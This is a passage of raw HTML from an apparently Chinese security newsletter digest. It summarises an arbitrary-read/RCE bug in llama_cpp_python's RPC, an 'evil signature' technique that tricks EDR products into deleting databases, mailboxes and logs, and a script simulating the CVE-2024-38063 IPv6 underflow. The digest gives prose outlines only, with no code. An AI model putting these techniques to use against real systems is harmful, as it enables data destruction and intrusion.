		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:360 老哥挖的 llama_cpp_python rpc 的 rce.</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg1CQ0UiaeSVJ3CQqI7b1bF9qqEqPAI8SkvWrfIcXjMOibyiblRWATHI5lw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg1CQ0UiaeSVJ3CQqI7b1bF9qqEqPAI8SkvWrfIcXjMOibyiblRWATHI5lw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844182154552528"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该漏洞源于 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">g</code> 指针的不安全处理，允许用户控制，进而导致任意地址读取。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的危险性在于它不仅可以被用于信息泄露，还可以与其他漏洞相结合，实现更严重的攻击，如远程代码执行（RCE）。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞发现者已经提供了一个详细的漏洞利用示例，包括如何构建、复现以及实际的攻击效果。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该漏洞的存在强调了在软件开发中进行安全审查和测试的重要性，特别是在处理用户输入和内存操作时。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞, 信息泄露, 远程代码执行, GitHub</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0d
			 恶意签名注入：利用Evil Signatures远程删除数据库和邮箱</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要讨论了如何利用恶意签名（Evil Signature）远程删除数据库、邮箱和日志文件，通过将特定的恶意签名注入到系统中，诱使端点检测和响应（EDR）系统误以为这些文件是高危性病毒，从而导致EDR系统自动删除这些文件。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.55" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="640" src="https://wechat2rss.xlab.app/img-proxy/?k=937af6a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTguroGtyjduJ9IGyg8qGJFU5zicgRy79l8iaT72EL4EtUDGO74As7qWRzw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6552380952380953" data-w="525" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=3d8269d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgRm5oXucTuCqHcYgF8iaicmBtwbvfy4946yPfS0pzjvUBxvOteNiarOmMg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5727699530516432" data-w="639" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=38a6cfc3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgibSgk1AN1MvIUEPDM67QRxIbQviaIRia3zmlp8S9B75GJZhSMQxCNrqdQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">恶意签名注入：远程删除数据库、邮箱和日志文件</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">恶意签名注入：利用恶意签名远程删除数据库、邮箱和日志文件</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgPygjokzicUBKtApnqm1hsicib3nFmElfIkkCb7ET3oL8fBW7aZ7LKMJTA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgPygjokzicUBKtApnqm1hsicib3nFmElfIkkCb7ET3oL8fBW7aZ7LKMJTA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855181841125421"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以利用EDR系统的检测机制来删除特定文件：通过将恶意签名注入到系统中，可以诱使EDR系统将包含这些签名的文件误认为是高危性病毒，从而导致自动删除这些文件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">恶意签名注入技术适用于多种场景：文章提供了多个实际案例，展示了这种技术如何应用于删除Web服务器日志、FTP用户名、邮箱、系统日志、EDR系统日志、Splunk日志以及数据库文件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">客户端也可能受到这种攻击：攻击者可以通过客户端攻击向量，如CSRF、XSS、SSRF等，将恶意签名注入到客户端系统中，导致客户端的文件被错误地删除。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于这种攻击的认识和应对：尽管这种攻击技术已经被报告并得到了修复，但需要持续关注，因为任何特权软件都可能受到恶意签名注入的攻击，这可能导致严重的安全问题。</section></li></ul>
	<br/>
	<p>🏷️: 恶意软件, EDR系统, 数据安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0e
			 Python脚本模拟IPv6数据包处理漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页内容主要展示了一个Python脚本，该脚本模拟了IPv6数据包处理过程中的一个整数下溢漏洞（CVE-2024-38063）。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a31b742c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgP1LcicahZmR3ZxVBgRljrX5SJewzgsHMSHhlyjQS9KJ8ngE8Yx8SK6A%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-38063 漏洞利用分析</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-38063 漏洞利用分析：无需蓝屏攻击</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTga1n6hibvTa99wfXXFUHyBtnXGKMGUcrvpI6ZknQUAdpZXWJtmiatjIdQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTga1n6hibvTa99wfXXFUHyBtnXGKMGUcrvpI6ZknQUAdpZXWJtmiatjIdQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855181815558112"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
